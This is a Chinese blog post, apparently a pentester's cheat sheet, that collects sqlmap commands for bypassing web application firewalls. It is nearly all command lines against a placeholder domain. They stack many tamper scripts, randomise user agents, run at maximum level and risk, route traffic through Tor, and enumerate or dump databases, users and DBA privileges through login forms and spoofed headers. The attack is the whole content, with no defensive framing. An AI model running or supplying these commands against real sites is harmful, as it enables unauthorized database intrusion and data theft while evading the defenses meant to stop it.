sqlmap bypass waf ﹣烏鷄

序言

sqlmap bypass waf 语句收集

Part.1

sqlmap -u "ruo.red" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u "ruo.red" --identify-waf --random-agent -v 3 --dbs

sqlmap -u "ruo.red" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "http://ruo.red/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "ruo.red/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --dbs --technique=T

sqlmap -u "ruo.red/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --headers="input field header" --dbs --technique=T

Part.2

sqlmap -u "ruo.red" --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u "ruo.red" --random-agent -v 3 --dbs

sqlmap -u "ruo.red" --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "http://ruo.red/login" --data="userid=admin&passwd=admin" --method POST --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbs

example dump DB use poc http post request :

sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbms=MySQL -D database_target --tables

sqlmap -u https://ruo.red/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --drop-set-cookie --dbms=mysql --dbs

sqlmap -u https://ruo.red/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --dbs

--level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs

--dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs

--dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs

-v3 --technique=T --no-cast --fresh-queries --banner

sqlmap -u http://ruo.red/?id=1 --level 2 --risk 3 --batch --dbs

-f -b --current-user --current-db --is-dba --users --dbs

--risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

--risk 3 --level 5 --random-agent --proxy http://ruo.red --dbs

--random-agent --dbms=MYSQL --dbs --technique=B"

--identify-waf --random-agent -v 3 --dbs

--tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

Part.3 梭哈疗法

--level=5 --risk=3 --random-agent -- tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

 --level 5 --risk -- tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

--level 5 --risk 3 -- tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

--level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

--time-sec=20 --random-agent --level=5 --risk=3 --tamper="space2comment,between,randomcase,charencode" --technique=BEUST --privileges --no-cast --tor --tor-port=9050 --tor-type=socks5 --check-tor --banner --union-char=1 --dbms=MySQL --dbs

本文作者为烏鷄哥，转载请注明。

bypass sqlmap waf